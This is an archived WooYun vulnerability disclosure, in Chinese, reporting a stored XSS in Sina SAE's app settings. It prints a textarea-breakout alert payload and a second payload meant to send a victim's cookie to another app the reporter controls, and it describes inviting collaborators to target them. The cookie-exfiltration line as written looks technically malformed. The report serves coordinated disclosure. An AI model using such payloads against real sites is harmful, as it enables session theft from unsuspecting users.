当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044024

漏洞标题:新浪某分站存储型xss漏洞(可指定目标)

相关厂商:新浪

漏洞作者: 大亮

提交时间:2013-11-25 18:02

修复时间:2014-01-09 18:02

公开时间:2014-01-09 18:02

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-25: 细节已通知厂商并且等待厂商处理中
2013-11-25: 厂商已经确认,细节仅向厂商公开
2013-12-05: 细节向核心白帽子及相关领域专家公开
2013-12-15: 细节向普通白帽子公开
2013-12-25: 细节向实习白帽子公开
2014-01-09: 细节向公众公开

简要描述:

研究xss当中,不惧失败的再次提交下漏洞。

详细说明:

1.厉害的白帽子都有自己的服务器,所以我就选择的去新浪sae网站去看了一下
2.搭建自己的网页应用服务,看见应用设置中的应用描述是个textarea,所以就想试试能不能弹窗,输入代码

</textarea><script>alert(document.cookie)</script>


看见了弹窗

1.jpg


可是现在弹窗,只能自己看自己的cookie,有没有办法让别人进入这个页面呢
发现代码管理中可以邀请别人,所以我邀请了一位童鞋来当参与者

2.jpg


3.这位童鞋接受了我的邀请

.jpg


然后问同鞋对这个应用有什么权限,他发来截图

3.jpg


他也有应用设置的权限,让他点下,他那边也弹窗,这应该是个xss漏洞了。
那么我就可以将alert(document.cookie)代码修改一下,
改成发送到我另一个app的代码
</textarea><img src="web2.sinaapp.com?c=<script>document.cookie</script>" width=0 height=0>
这样就可以将cookie值传入另一个app中,这个app当作专门调取别人的cookie来用。
另一个app来接受别人的cookie。

漏洞证明:

1.jpg

修复方案:

过滤字符,对症下药

版权声明:转载请注明来源 大亮@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2013-11-25 19:20

厂商回复:

感谢关注新浪安全,该问题已经确认,由于需要的交互性比较大,影响有限,如有疑问,可直接私信联系!

最新状态:

暂无


漏洞评价:

评论